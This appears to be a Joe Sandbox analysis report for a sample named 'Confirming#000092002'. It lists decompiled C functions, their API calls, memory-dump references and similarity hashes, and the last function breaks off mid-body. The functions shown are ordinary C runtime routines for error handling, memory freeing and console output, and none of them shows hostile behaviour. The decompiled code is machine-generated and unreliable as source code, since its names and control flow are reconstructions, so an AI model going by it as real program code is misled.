Function 00EA9F50 Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EA9F50(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E00EAB146(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E00EAB146(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E00EA759E(GetLastError());
									_t19 =  *((intOrPtr*)(E00EA75D4(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E00EAA58C(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E00EA759E(GetLastError());
						return  *((intOrPtr*)(E00EA75D4(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E00EAA58C(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E00EAA572(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x00ea9f57
0x00ea9f5c
0x00ea9f7a
0x00ea9f7c
0x00ea9f7f
0x00ea9fac
0x00ea9fb4
0x00ea9fb6
0x00ea9fcf
0x00ea9fd2
0x00ea9fd5
0x00ea9fe3
0x00ea9ff2
0x00ea9ffa
0x00ea9ffc
0x00eaa015
0x00eaa018
0x00eaa018
0x00ea9ffe
0x00eaa005
0x00eaa010
0x00eaa010
0x00eaa01a
0x00000000
0x00eaa01a
0x00ea9fda
0x00ea9fdf
0x00ea9fe1
0x00000000
0x00000000
0x00000000
0x00ea9fe1
0x00ea9fbf
0x00000000
0x00ea9fca
0x00ea9f81
0x00ea9f84
0x00ea9f87
0x00ea9f9a
0x00ea9f9d
0x00ea9f70
0x00ea9f70
0x00000000
0x00ea9f73
0x00ea9f8d
0x00ea9f92
0x00ea9f94
0x00eaa01e
0x00eaa01e
0x00000000
0x00ea9f94
0x00ea9f5e
0x00ea9f63
0x00ea9f68
0x00ea9f6a
0x00ea9f6d
0x00000000

APIs

Part of subcall function 00EAA572: _free.LIBCMT ref: 00EAA580

Part of subcall function 00EAB146: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,00EADE4D,0000FDE9,00000000,?,?,?,00EADBC6,0000FDE9,00000000,?), ref: 00EAB1F2

GetLastError.KERNEL32 ref: 00EA9FB8
__dosmaperr.LIBCMT ref: 00EA9FBF
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00EA9FFE
__dosmaperr.LIBCMT ref: 00EAA005

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: c83ea07e6e8ba30b3d2366306056428c855c322a73485664d07c9f0da0c8e18a
Instruction ID: f0e5358f1ab4bb12f322bd7df314af73acb43f830d5d790fca1de4ada0105fed
Opcode Fuzzy Hash: c83ea07e6e8ba30b3d2366306056428c855c322a73485664d07c9f0da0c8e18a
Instruction Fuzzy Hash: D92181716043056FDB20AF618CC09AB77A8EF0E3687149629F869FF252D731FC409B61

Uniqueness

Uniqueness Score: -1.00%

Function 00EA1A54 Relevance: 6.1, APIs: 4, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00EA1A54(void* __ebx, intOrPtr* __edi, intOrPtr* __esi, void* __eflags) {
				struct _CRITICAL_SECTION* _t22;
				void* _t25;
				void* _t28;
				void* _t29;
				void* _t49;
				void* _t50;
				void* _t52;

				_t48 = __esi;
				_t47 = __edi;
				_push(0x10);
				E00EB0216(0xeb07fb, __ebx, __edi, __esi);
				_t36 =  *((intOrPtr*)(_t49 + 0xc));
				if( *((intOrPtr*)(_t49 + 0xc)) != 0 &&  *((intOrPtr*)(_t49 + 0x10)) != 0) {
					_t22 =  *((intOrPtr*)(_t49 + 8)) + 0x10;
					 *(_t49 - 0x1c) = _t22;
					EnterCriticalSection(_t22);
					_t48 = 0;
					 *((intOrPtr*)(_t49 - 0x18)) = 0;
					 *((intOrPtr*)(_t49 - 4)) = 0;
					 *((intOrPtr*)(_t49 - 0x14)) = E00EA75E7(_t36) + 1;
					_t25 = E00EA1181(_t49 - 0x14, E00EA75E7(_t36) + 1);
					_t52 = _t50 + 4;
					if(_t25 < 0) {
						L9:
						_t36 = 0x8007000e;
					} else {
						_t47 =  *((intOrPtr*)(_t49 - 0x14));
						_t57 = _t47 - 0x400;
						if(_t47 > 0x400 || E00EA11AE(_t36, _t47, _t47, 0, _t57) == 0) {
							_t28 = E00EA3CD7(_t49 - 0x18, _t48, _t47);
							_t48 =  *((intOrPtr*)(_t49 - 0x18));
						} else {
							E00EB02F0(_t47);
							_t28 = _t52;
						}
						_t29 = E00EA1251(_t28, _t36, _t47, 3);
						_t59 = _t29;
						if(_t29 == 0) {
							goto L9;
						} else {
							_push( *((intOrPtr*)(_t49 + 0x10)));
							_push(_t29);
							_t47 = E00EA175A(_t36,  *((intOrPtr*)(_t49 + 8)) + 4, _t47, _t48, _t59);
							LeaveCriticalSection( *(_t49 - 0x1c));
							_t36 =  !=  ? 0 : 0x8007000e;
						}
					}
					if(_t48 != 0) {
						do {
							_t47 =  *_t48;
							_t48 = _t47;
							E00EA7188(_t48);
						} while (_t47 != 0);
					}
				}
				return E00EB01C5(_t36, _t47, _t48);
			}

0x00ea1a54
0x00ea1a54
0x00ea1a54
0x00ea1a5b
0x00ea1a60
0x00ea1a65
0x00ea1a78
0x00ea1a7c
0x00ea1a7f
0x00ea1a85
0x00ea1a87
0x00ea1a8b
0x00ea1a99
0x00ea1a9c
0x00ea1aa1
0x00ea1aa6
0x00ea1b0d
0x00ea1b0d
0x00ea1aa8
0x00ea1aa8
0x00ea1aab
0x00ea1ab1
0x00ea1acd
0x00ea1ad2
0x00ea1abe
0x00ea1ac0
0x00ea1ac5
0x00ea1ac5
0x00ea1adc
0x00ea1ae1
0x00ea1ae3
0x00000000
0x00ea1ae5
0x00ea1ae8
0x00ea1aeb
0x00ea1af7
0x00ea1af9
0x00ea1b08
0x00ea1b08
0x00ea1ae3
0x00ea1b14
0x00ea1b16
0x00ea1b16
0x00ea1b19
0x00ea1b1b
0x00ea1b21
0x00ea1b16
0x00ea1b25
0x00ea1b36

APIs

__EH_prolog3_GS.LIBCMT ref: 00EA1A5B
EnterCriticalSection.KERNEL32(?,00000010,00EA362B,?,Module,?), ref: 00EA1A7F
LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,?), ref: 00EA1AF9

Part of subcall function 00EA11AE: __alloca_probe_16.LIBCMT ref: 00EA11D1

__alloca_probe_16.LIBCMT ref: 00EA1AC0

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: CriticalSection__alloca_probe_16$EnterH_prolog3_Leave
String ID:
API String ID: 4018831387-0
Opcode ID: 5ab63f0654e5e7034a59bcd9072dcdd889077a053214b2b0e4e9c0a745017a12
Instruction ID: fa53296d9c8ca9523df9f7f764a251a3478f490e3df1a77537b20d63d898691d
Opcode Fuzzy Hash: 5ab63f0654e5e7034a59bcd9072dcdd889077a053214b2b0e4e9c0a745017a12
Instruction Fuzzy Hash: 3A21AF32B00205DBCB109FA8C8857EF76E5AF4E354F1560A9A915BF241EA34FD05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EA90A4 Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00EA90A4(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0xeb9050; // 0x6
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00EA995D(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E00EA9E27(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E00EA995D(__eflags,  *0xeb9050, _t51);
							if(__eflags != 0) {
								E00EA8ED2(_t51, 0xfe295c);
								E00EA8B82(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E00EA995D(__eflags,  *0xeb9050, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E00EA995D(0,  *0xeb9050, 0);
							_push(0);
							L9:
							E00EA8B82();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00EA991E(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0xeb9050; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00EA8A26(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0xeb9050; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E00EA995D(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00EA9E27(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E00EA995D(__eflags,  *0xeb9050, _t60);
								if(__eflags != 0) {
									E00EA8ED2(_t60, 0xfe295c);
									E00EA8B82(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E00EA995D(__eflags,  *0xeb9050, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E00EA995D(__eflags,  *0xeb9050, _t20);
								_push(_t60);
								L25:
								E00EA8B82();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00EA991E(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0xeb9050; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00EA8A26(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0xeb9050; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E00EA995D(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00EA9E27(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E00EA995D(__eflags,  *0xeb9050, _t54);
											if(__eflags != 0) {
												E00EA8ED2(_t54, 0xfe295c);
												E00EA8B82(0);
												goto L45;
											} else {
												_t40 = 0;
												E00EA995D(__eflags,  *0xeb9050, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E00EA995D(0,  *0xeb9050, 0);
											_push(0);
											L41:
											E00EA8B82();
											goto L36;
										}
									}
								} else {
									_t54 = E00EA991E(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0xeb9050; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x00ea90a4
0x00ea90a4
0x00ea90af
0x00ea90b1
0x00ea90b6
0x00ea90b9
0x00ea90d7
0x00ea90da
0x00ea90df
0x00ea90e1
0x00000000
0x00ea90e3
0x00ea90ef
0x00ea90f2
0x00ea90f3
0x00ea90f5
0x00ea911a
0x00ea911c
0x00ea9135
0x00ea913c
0x00ea9141
0x00000000
0x00ea911e
0x00ea911e
0x00ea9127
0x00ea912c
0x00000000
0x00ea912c
0x00ea90f7
0x00ea90f7
0x00ea90f7
0x00ea9100
0x00ea9105
0x00ea9106
0x00ea9106
0x00ea910b
0x00000000
0x00ea910b
0x00ea90f5
0x00ea90bb
0x00ea90c1
0x00ea90c5
0x00ea90d2
0x00000000
0x00ea90c7
0x00ea90ca
0x00ea9144
0x00ea9144
0x00ea90cc
0x00ea90cc
0x00ea90cc
0x00ea90ce
0x00ea90ce
0x00ea90ce
0x00ea90ca
0x00ea90c5
0x00ea9147
0x00ea914f
0x00ea9151
0x00ea9153
0x00ea915b
0x00ea9160
0x00ea9161
0x00ea9166
0x00ea9167
0x00ea916a
0x00ea9184
0x00ea9187
0x00ea918c
0x00ea918e
0x00000000
0x00ea9190
0x00ea919c
0x00ea919f
0x00ea91a0
0x00ea91a2
0x00ea91c5
0x00ea91c7
0x00ea91de
0x00ea91e5
0x00ea91ea
0x00000000
0x00ea91c9
0x00ea91d0
0x00ea91d5
0x00000000
0x00ea91d5
0x00ea91a4
0x00ea91ab
0x00ea91b0
0x00ea91b1
0x00ea91b1
0x00ea91b6
0x00000000
0x00ea91b6
0x00ea91a2
0x00ea916c
0x00ea9172
0x00ea9174
0x00ea9176
0x00ea917f
0x00000000
0x00ea9178
0x00ea9178
0x00ea917b
0x00ea91f5
0x00ea91f5
0x00ea91fa
0x00ea91fd
0x00ea91fe
0x00ea91ff
0x00ea9206
0x00ea9208
0x00ea920d
0x00ea9210
0x00ea922e
0x00ea9231
0x00ea9236
0x00ea9238
0x00000000
0x00ea923a
0x00ea9246
0x00ea924a
0x00ea924c
0x00ea9271
0x00ea9273
0x00ea928c
0x00ea9293
0x00000000
0x00ea9275
0x00ea9275
0x00ea927e
0x00ea9283
0x00000000
0x00ea9283
0x00ea924e
0x00ea924e
0x00ea924e
0x00ea9257
0x00ea925c
0x00ea925d
0x00ea925d
0x00000000
0x00ea9262
0x00ea924c
0x00ea9212
0x00ea9218
0x00ea921a
0x00ea921c
0x00ea9229
0x00000000
0x00ea921e
0x00ea921e
0x00ea9221
0x00ea929b
0x00ea929b
0x00ea9223
0x00ea9223
0x00ea9223
0x00ea9223
0x00ea9225
0x00ea9225
0x00ea9225
0x00ea9221
0x00ea921c
0x00ea929e
0x00ea92a6
0x00ea92a8
0x00ea92a8
0x00ea92af
0x00ea917d
0x00ea91ed
0x00ea91ed
0x00ea91ef
0x00000000
0x00ea91f1
0x00ea91f4
0x00ea91f4
0x00ea91ef
0x00ea917b
0x00ea9176
0x00ea9155
0x00ea915a
0x00ea915a

APIs

GetLastError.KERNEL32(?,?,?,00EA7123,?,?,00000000,?,00EA9C0E,00000000,00000000,?,00000000), ref: 00EA90A9
_free.LIBCMT ref: 00EA9106
_free.LIBCMT ref: 00EA913C
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00EA9C0E,00000000,00000000,?,00000000), ref: 00EA9147

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: a5041426a46b43ef0d9181da83d7ce6dc19ca1e7a95113cfb6308239cdb2ecc9
Instruction ID: cb846dce21618df4a499a2d4c06e2f4fa2219c0a62b52e15d5a978dd0a8606ab
Opcode Fuzzy Hash: a5041426a46b43ef0d9181da83d7ce6dc19ca1e7a95113cfb6308239cdb2ecc9
Instruction Fuzzy Hash: 5E118A712051026EDA1136B59CC5D6B27D99BDF3B9B252328F229BF1E3DD61AC099120

Uniqueness

Uniqueness Score: -1.00%

Function 00EA91FB Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00EA91FB(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0xeb9050; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00EA995D(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E00EA9E27(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E00EA995D(__eflags,  *0xeb9050, _t18);
							if(__eflags != 0) {
								E00EA8ED2(_t18, 0xfe295c);
								E00EA8B82(0);
								goto L13;
							} else {
								_t13 = 0;
								E00EA995D(__eflags,  *0xeb9050, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E00EA995D(0,  *0xeb9050, 0);
							_push(0);
							L9:
							E00EA8B82();
							goto L4;
						}
					}
				} else {
					_t18 = E00EA991E(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0xeb9050; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x00ea9206
0x00ea9208
0x00ea920d
0x00ea9210
0x00ea922e
0x00ea9231
0x00ea9236
0x00ea9238
0x00000000
0x00ea923a
0x00ea9246
0x00ea924a
0x00ea924c
0x00ea9271
0x00ea9273
0x00ea928c
0x00ea9293
0x00000000
0x00ea9275
0x00ea9275
0x00ea927e
0x00ea9283
0x00000000
0x00ea9283
0x00ea924e
0x00ea924e
0x00ea924e
0x00ea9257
0x00ea925c
0x00ea925d
0x00ea925d
0x00000000
0x00ea9262
0x00ea924c
0x00ea9212
0x00ea9218
0x00ea921c
0x00ea9229
0x00000000
0x00ea921e
0x00ea9221
0x00ea929b
0x00ea929b
0x00ea9223
0x00ea9223
0x00ea9223
0x00ea9225
0x00ea9225
0x00ea9225
0x00ea9221
0x00ea921c
0x00ea929e
0x00ea92a6
0x00ea92af

APIs

GetLastError.KERNEL32(?,?,?,00EA75D9,00EA116B), ref: 00EA9200
_free.LIBCMT ref: 00EA925D
_free.LIBCMT ref: 00EA9293
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00EA75D9,00EA116B), ref: 00EA929E

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e792f8f0f293a182602bf83a47508d3717bc3c939a6daf660f011198514e50d5
Instruction ID: 9ec8bbcaf90c9f181bd5faa010dae6afbcfa554929cbcafe62533c576d34562e
Opcode Fuzzy Hash: e792f8f0f293a182602bf83a47508d3717bc3c939a6daf660f011198514e50d5
Instruction Fuzzy Hash: 391152762041017E961126AABC85F6B37D99BCF779B242728F628BE1F3DD61AC099130

Uniqueness

Uniqueness Score: -1.00%

Function 00EAF486 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00EAF486(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xeb9860, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00EAF46F();
					E00EAF431();
					_t13 = WriteConsoleW( *0xeb9860, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x00eaf4a3
0x00eaf4a7
0x00eaf4b4
0x00eaf4b9
0x00eaf4d4
0x00eaf4d4
0x00eaf4da

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00EAE629,?,00000001,?,?,?,00EAD89C,?,00000000,?), ref: 00EAF49D
GetLastError.KERNEL32(?,00EAE629,?,00000001,?,?,?,00EAD89C,?,00000000,?,?,?,?,00EADDE8,00000000), ref: 00EAF4A9

Part of subcall function 00EAF46F: CloseHandle.KERNEL32(FFFFFFFE,00EAF4B9,?,00EAE629,?,00000001,?,?,?,00EAD89C,?,00000000,?,?,?), ref: 00EAF47F

___initconout.LIBCMT ref: 00EAF4B9

Part of subcall function 00EAF431: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EAF460,00EAE616,?,?,00EAD89C,?,00000000,?,?), ref: 00EAF444

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00EAE629,?,00000001,?,?,?,00EAD89C,?,00000000,?,?), ref: 00EAF4CE

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 9f66d7ecff9028ec42e867063fd75362e5e3d98fd2c9ba405ced9a435c0a42a1
Instruction ID: 7f40a4743ea0bbca9cf45ad54f9869c65b769437b5902fbeba54f8d8b1388368
Opcode Fuzzy Hash: 9f66d7ecff9028ec42e867063fd75362e5e3d98fd2c9ba405ced9a435c0a42a1
Instruction Fuzzy Hash: FFF09E36500159BFCF122FD69C0499B3E66FB4E371B544264FA28A9131D6319864EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EA85AB Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EA85AB() {

				E00EA8B82( *0xfe2954);
				 *0xfe2954 = 0;
				E00EA8B82( *0xfe2958);
				 *0xfe2958 = 0;
				E00EA8B82( *0xfe2db0);
				 *0xfe2db0 = 0;
				E00EA8B82( *0xfe2db4);
				 *0xfe2db4 = 0;
				return 1;
			}

0x00ea85b4
0x00ea85c1
0x00ea85c7
0x00ea85d2
0x00ea85d8
0x00ea85e3
0x00ea85e9
0x00ea85f1
0x00ea85fa

APIs

_free.LIBCMT ref: 00EA85B4

Part of subcall function 00EA8B82: HeapFree.KERNEL32(00000000,00000000,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?), ref: 00EA8B98
Part of subcall function 00EA8B82: GetLastError.KERNEL32(?,?,00EABD3B,?,00000000,?,?,?,00EABD62,?,00000007,?,?,00EAC188,?,?), ref: 00EA8BAA

_free.LIBCMT ref: 00EA85C7
_free.LIBCMT ref: 00EA85D8
_free.LIBCMT ref: 00EA85E9

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0e3f52910dba62ef9c1306447d616860fd1902321afb21db450ec0a11c32527e
Instruction ID: e24cf4cef0b5c45654f83dc7edc80604fa86024ffe3a0c9d314aac80fed49ecd
Opcode Fuzzy Hash: 0e3f52910dba62ef9c1306447d616860fd1902321afb21db450ec0a11c32527e
Instruction Fuzzy Hash: 71E086B44011EC9A86E26F14FE9188D3FADF759720B443105F0002E232EF391653BBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00EA7CE5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00EA7CE5(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E00EAAD73(_t48);
